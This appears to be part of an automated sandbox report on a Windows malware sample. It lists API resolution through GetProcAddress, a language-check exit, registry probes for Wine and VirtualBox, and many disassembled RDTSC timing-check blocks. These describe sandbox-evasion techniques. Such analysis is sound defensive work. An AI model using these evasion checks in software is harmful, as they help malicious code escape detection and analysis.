Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EB9BB0

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-36553
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F8502 second address: 12F8506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F8506 second address: 12F850E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F850E second address: 12F8528 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F8528 second address: 12F8531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F8531 second address: 12F853C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F853C second address: 12F8540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1308A40 second address: 1308A82 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC850CE3D36h 0x00000008 jns 00007FC850CE3D36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 jbe 00007FC850CE3D36h 0x00000017 pop edi 0x00000018 jmp 00007FC850CE3D3Bh 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jne 00007FC850CE3D4Ch 0x00000026 jmp 00007FC850CE3D46h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1308A82 second address: 1308AA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC8515781DAh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FC8515781DCh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1308AA4 second address: 1308AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130905E second address: 1309078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8515781DFh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1309078 second address: 130908D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC850CE3D3Ah 0x00000008 jnp 00007FC850CE3D36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130C2E8 second address: 130C328 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FC8515781DCh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC8515781E2h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130C402 second address: 130C46D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 12440AF5h 0x00000010 add edi, dword ptr [ebp+122D3650h] 0x00000016 lea ebx, dword ptr [ebp+124521F1h] 0x0000001c mov edi, dword ptr [ebp+122D18CFh] 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 pushad 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 jmp 00007FC850CE3D42h 0x0000002c popad 0x0000002d pushad 0x0000002e push edi 0x0000002f pop edi 0x00000030 je 00007FC850CE3D36h 0x00000036 popad 0x00000037 popad 0x00000038 push eax 0x00000039 push ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FC850CE3D42h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130C46D second address: 130C471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130C68E second address: 130C693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130C693 second address: 130C737 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC8515781E1h 0x00000008 ja 00007FC8515781D6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xor dword ptr [esp], 773645E5h 0x00000018 stc 0x00000019 push 00000003h 0x0000001b sub dh, FFFFFFCEh 0x0000001e push 00000000h 0x00000020 mov esi, dword ptr [ebp+122D3494h] 0x00000026 push 00000003h 0x00000028 mov dx, CE01h 0x0000002c call 00007FC8515781D9h 0x00000031 jmp 00007FC8515781E0h 0x00000036 push eax 0x00000037 push ecx 0x00000038 jmp 00007FC8515781E1h 0x0000003d pop ecx 0x0000003e mov eax, dword ptr [esp+04h] 0x00000042 pushad 0x00000043 jp 00007FC8515781E5h 0x00000049 jmp 00007FC8515781DFh 0x0000004e pushad 0x0000004f pushad 0x00000050 popad 0x00000051 push ecx 0x00000052 pop ecx 0x00000053 popad 0x00000054 popad 0x00000055 mov eax, dword ptr [eax] 0x00000057 js 00007FC8515781DEh 0x0000005d jl 00007FC8515781D8h 0x00000063 push ebx 0x00000064 pop ebx 0x00000065 mov dword ptr [esp+04h], eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d jg 00007FC8515781D6h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130C737 second address: 130C74B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D40h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130C74B second address: 130C755 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC8515781DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130C755 second address: 130C7A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov esi, eax 0x00000009 mov si, 7AF2h 0x0000000d lea ebx, dword ptr [ebp+12452205h] 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FC850CE3D38h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d jno 00007FC850CE3D47h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130C7A2 second address: 130C7AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC8515781D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130C7AD second address: 130C7B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130C7B3 second address: 130C7B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132BEF5 second address: 132BF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132C31A second address: 132C31E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132C31E second address: 132C324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132C324 second address: 132C32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132C32A second address: 132C330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132C330 second address: 132C334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132C4BE second address: 132C4CA instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC850CE3D36h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132C63F second address: 132C660 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC8515781DAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c jl 00007FC8515781D6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007FC8515781D6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132C660 second address: 132C664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132C7BB second address: 132C7C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132C7C1 second address: 132C7DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007FC850CE3D36h 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132C7DB second address: 132C7E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132C7E1 second address: 132C7ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC850CE3D36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132C7ED second address: 132C7F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132C7F1 second address: 132C7FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132CACB second address: 132CAD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132D1E9 second address: 132D1ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132D1ED second address: 132D1F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132D1F1 second address: 132D1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132D91F second address: 132D933 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC8515781D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132D933 second address: 132D938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132D938 second address: 132D94F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FC8515781D6h 0x0000000a jmp 00007FC8515781DDh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132D94F second address: 132D953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1331D7B second address: 1331D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1331D7F second address: 1331DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC850CE3D3Eh 0x0000000b popad 0x0000000c push eax 0x0000000d ja 00007FC850CE3D3Ah 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1331DA8 second address: 1331DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1330C03 second address: 1330C18 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC850CE3D3Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13340CD second address: 13340D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13340D1 second address: 13340D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1338028 second address: 133803D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FC8515781DFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133803D second address: 133804E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jbe 00007FC850CE3D36h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13381FB second address: 1338229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b jmp 00007FC8515781E1h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC8515781DEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1338229 second address: 133822D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1338509 second address: 133850D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133850D second address: 1338519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13387F9 second address: 13387FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1338A8F second address: 1338A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1338A99 second address: 1338AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC8515781D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1338AA3 second address: 1338AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133A287 second address: 133A28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133A28B second address: 133A2A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D44h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133A2A3 second address: 133A2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133D94D second address: 133D952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133E397 second address: 133E3A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133E403 second address: 133E43B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 jmp 00007FC850CE3D3Ch 0x00000017 popad 0x00000018 xchg eax, ebx 0x00000019 or edi, dword ptr [ebp+122D2360h] 0x0000001f push eax 0x00000020 pushad 0x00000021 jmp 00007FC850CE3D3Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 push edi 0x00000029 pop edi 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133E82B second address: 133E82F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133E82F second address: 133E839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133E839 second address: 133E86D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FC8515781E8h 0x00000010 jmp 00007FC8515781E0h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133E86D second address: 133E872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133E996 second address: 133E9C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC8515781DFh 0x00000008 jp 00007FC8515781D6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC8515781DDh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133E9C1 second address: 133E9CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC850CE3D3Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133E9CF second address: 133EA08 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC8515781D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FC8515781D8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 jmp 00007FC8515781DAh 0x0000002c push eax 0x0000002d push ebx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133EA08 second address: 133EA0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133EEED second address: 133EEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133F87D second address: 133F892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1340B13 second address: 1340B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1340B17 second address: 1340B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FC850CE3D38h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D17B4h] 0x00000029 or edi, dword ptr [ebp+122D3049h] 0x0000002f push 00000000h 0x00000031 mov edi, 3A813983h 0x00000036 push 00000000h 0x00000038 jmp 00007FC850CE3D46h 0x0000003d xchg eax, ebx 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push esi 0x00000042 pop esi 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1340B71 second address: 1340B87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jo 00007FC8515781E2h 0x0000000e jo 00007FC8515781DCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13401BA second address: 13401BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13401BF second address: 13401D5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC8515781DBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1342038 second address: 134207B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a movzx esi, cx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FC850CE3D38h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 jmp 00007FC850CE3D3Ch 0x0000002e push 00000000h 0x00000030 movzx esi, di 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
